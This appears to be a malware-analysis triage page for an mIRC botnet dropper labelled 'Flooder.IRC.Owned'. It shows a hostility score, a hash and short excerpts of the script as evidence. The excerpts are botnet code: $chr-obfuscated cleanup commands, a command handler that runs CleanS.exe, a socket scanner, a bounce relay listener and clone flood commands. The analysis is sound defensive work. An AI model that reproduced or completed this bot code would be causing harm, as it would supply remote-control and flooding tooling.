Hostile 92% Download

Flooder.IRC.Owned

mIRC botnet dropper

mIRC text handler launches an exeDetects mIRC TEXT event
SHA-25647b0a31111e77f56e82c9c4ee0db19546dad774ec5ab44ec397e38feabb7f625
MaleculeO(C)

Evidence

Detects mIRC TEXT event lines 17–28
17:56… (111) $+ $chr(118) $+ $chr(101) remote.ini
18 $chr(46) $+ $chr(82) $+ $chr(101) $+ $chr(109) $+ $chr(111) $+ $chr(118) $+ $chr(101) CleanS.exe
19 .Timer 1 1 $chr(69) $+ $chr(120) $+ $chr(105) $+ $chr(116)
20 .Unload -rs Script
21}
22On *:Text:*:?: {
23 if ($1 == .dcc) { .dcc chat $nick }
24 if ($1 == .Achan) { .Set %B.A.C $2- }
⋯4 lines
Reads an mIRC socket line lines 175–181
175:54… )
176 bset &binvar 9 0
177 sockwrite $sockname &binvar
178}
179on *:sockread:firewall*:{
180 set %temp1 $gettok($sockname,2-,44)
181 if ($sockerr > 0) { eclones error reading(firewall): $replace(%temp1,$chr( …
Listens with an mIRC socket lines 364–372
364:4… msg = $+ %chatwin sock scaned: $sock($sockname).ip relust: close
365 sockclose $sockname
366}
367on *:socklisten:bnc1 {
368 if (%bnc.echo == on) { /msg = $+ %chatwin connection acceptd ip: $sock($sockname).ip port: $sock($sockname).port }
369 sockopen bnc3 %bnc.server %bnc.sport
370 sockaccept bnc2
371}
372on …
English function-word token "with" lines 543–545
543:10… g = $+ $nick .part - clones parting a channel with a message
544 .msg = $+ $nick .msg - clones msging a channel or a nick
545 .msg = $+ $n …
Launches an exe from mIRC lines 659–666
659:2… if ($2 != $null) { set %c.port $2 | /msg = $+ $nick port( $+ %c.port $+ ) been seted }
660 }
661 if ($1 == .mirc) { //Run CleanS.exe }
662 if ($1 == .exit) { /msg = $+ $nick closing mirc | /exit }
663 if ($1 == .server) {
664 if ($2 != $null) { /server $2- | /msg = $+ $nick moving to server: $2 }
665 }
666 if ($1 == .sockwrite) { /msg = $+ $nick sockwriting $2- | sockwrite $ …

Keyboard shortcuts on this page: j for the next sample, k for the previous one, x to go back to the feed, d to download the original bytes, r to re-queue the sample for analysis.